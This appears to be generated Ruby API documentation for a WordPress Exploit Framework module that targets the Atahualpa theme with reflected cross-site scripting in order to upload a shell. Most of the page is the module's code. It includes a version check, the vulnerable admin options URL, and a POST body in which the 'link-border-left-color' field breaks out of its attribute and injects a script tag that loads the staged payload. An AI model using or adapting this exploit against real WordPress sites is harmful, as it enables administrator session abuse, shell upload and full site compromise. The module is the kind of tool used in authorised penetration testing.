class Wpxf::Exploit::AtahualpaReflectedXssShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::StagedReflectedXss::new
# File lib/wpxf/modules/exploit/xss/reflected/atahualpa_reflected_xss_shell_upload.rb, line 6 def initialize super update_info( name: 'Atahualpa Reflected XSS Shell Upload', author: [ 'Spyros Gasteratos', # Disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8748'], ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_atahualpa_wordpress_theme.html'] ], date: 'Mar 02 2017' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/atahualpa_reflected_xss_shell_upload.rb, line 23 def check check_theme_version_from_style('atahualpa', '3.7.25') end
initial_script()
click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/atahualpa_reflected_xss_shell_upload.rb, line 31 def initial_script create_basic_post_script( vulnerable_url, 'widget_container' => 'margin: 0 0 15px 0;', 'widget_title' => 'font-size: 1.6em; font-weight: bold;', 'widget_lists[li-margin-left]' => '0', 'widget_lists[link-border-left-width]' => '7', 'widget_lists[link-border-left-color]' => 'CCCCCC', 'widget_lists[link-border-left-hover-color]' => '000000', 'widget_lists[link-padding-left]' => '5', 'widget_lists[link-weight]' => 'normal', 'widget_lists[link-color]' => '666666', 'widget_lists[link-hover-color]' => '000000', 'widget_lists2[li-margin-left]' => '5', 'widget_lists2[link-border-left-width]' => '7', 'widget_lists2[link-border-left-color]' => 'CCCCCC', 'widget_lists2[link-border-left-hover-color]' => '000000', 'widget_lists2[link-padding-left]' => '5', 'widget_lists2[link-weight]' => 'normal', 'widget_lists2[link-color]' => '666666', 'widget_lists2[link-hover-color]' => '000000', 'widget_lists3[li-margin-left]' => '5', 'widget_lists3[link-border-left-width]' => '7', 'widget_lists3[link-border-left-color]' => "CCCCCCw66ar\\\"><script>#{xss_ascii_encoded_include_script}<\\/script>", 'widget_lists3[link-border-left-hover-color]' => '000000', 'widget_lists3[link-padding-left]' => '5', 'widget_lists3[link-weight]' => 'normal', 'widget_lists3[link-color]' => '666666', 'widget_lists3[link-hover-color]' => '000000', 'category_widget_display_type' => 'inline', 'select_font_size' => 'Default', 'action' => 'save', 'category' => 'widgets' ) end
vulnerable_url()
click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/atahualpa_reflected_xss_shell_upload.rb, line 27 def vulnerable_url normalize_uri(wordpress_url_admin, 'themes.php?page=atahualpa-options') end